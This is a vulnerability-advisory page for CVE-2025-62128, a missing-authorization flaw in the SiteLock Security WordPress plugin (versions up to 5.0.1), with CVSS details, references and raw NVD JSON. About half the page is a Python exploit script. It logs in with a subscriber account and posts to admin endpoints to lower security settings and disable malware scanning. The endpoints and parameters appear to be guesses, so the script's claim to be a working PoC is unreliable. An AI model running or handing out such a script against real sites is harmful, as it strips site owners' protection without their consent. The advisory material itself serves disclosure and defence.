CVE-2025-62128

Description

Missing Authorization vulnerability in SiteLock SiteLock Security – WP Hardening, Login Security & Malware Scans sitelock allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security – WP Hardening, Login Security & Malware Scans: from n/a through <= 5.0.1.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

SiteLock Security WordPress插件 <= 5.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-62128 PoC - SiteLock WordPress Plugin Missing Authorization
# Target: WordPress site with SiteLock Security plugin <= 5.0.1
# This PoC demonstrates accessing admin functions with subscriber-level privileges

TARGET_URL = "https://vulnerable-site.com"
USERNAME = "low_priv_user"  # Low privilege account (subscriber role)
PASSWORD = "user_password"

def get_wordpress_nonce(url, cookie):
    """Get WordPress nonce for authenticated requests"""
    response = requests.get(f"{url}/wp-admin/admin.php?page=sitelock", cookies=cookie)
    if response.status_code == 200:
        import re
        nonce_match = re.search(r'data-nonce="([a-zA-Z0-9]+)"', response.text)
        if nonce_match:
            return nonce_match.group(1)
    return None

def exploit_sitelock_auth_bypass():
    """
    Exploit missing authorization in SiteLock Security plugin
    Attempts to access admin-only settings with low-privilege account
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    login_response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False
    
    print("[+] Successfully authenticated with low-privilege account")
    
    # Step 2: Get nonce
    cookie = session.cookies.get_dict()
    nonce = get_wordpress_nonce(TARGET_URL, cookie)
    
    # Step 3: Exploit - Access admin function without proper authorization
    # Target endpoint varies based on plugin version
    exploit_endpoints = [
        f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sitelock_update_settings",
        f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sitelock_security_scan",
        f"{TARGET_URL}/wp-json/sitelock/v1/settings"
    ]
    
    for endpoint in exploit_endpoints:
        headers = {'X-Requested-With': 'XMLHttpRequest'}
        if nonce:
            headers['X-WP-Nonce'] = nonce
        
        exploit_data = {
            'security_level': 'minimal',  # Downgrade security settings
            'malware_scan': 'disabled'    # Disable protection
        }
        
        response = session.post(endpoint, data=exploit_data, headers=headers)
        
        if response.status_code == 200 and 'success' in response.text.lower():
            print(f"[!] VULNERABLE: {endpoint}")
            print(f"[+] Successfully accessed admin function with low privileges")
            return True
    
    print("[-] Exploitation attempt completed - check manually")
    return False

if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-62128 PoC - SiteLock WordPress Plugin")
    print("Missing Authorization / Broken Access Control")
    print("="*60)
    exploit_sitelock_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62128
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62128
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62128/
[4] VulDB https://vuldb.com/cve/CVE-2025-62128
[5] https://patchstack.com/database/Wordpress/Plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62128", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:42.697", "lastModified": "2026-04-23T15:34:35.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in SiteLock SiteLock Security – WP Hardening, Login Security & Malware Scans sitelock allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security – WP Hardening, Login Security & Malware Scans: from n/a through <= 5.0.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en SiteLock SiteLock Security permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a SiteLock Security: desde n/a hasta 5.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}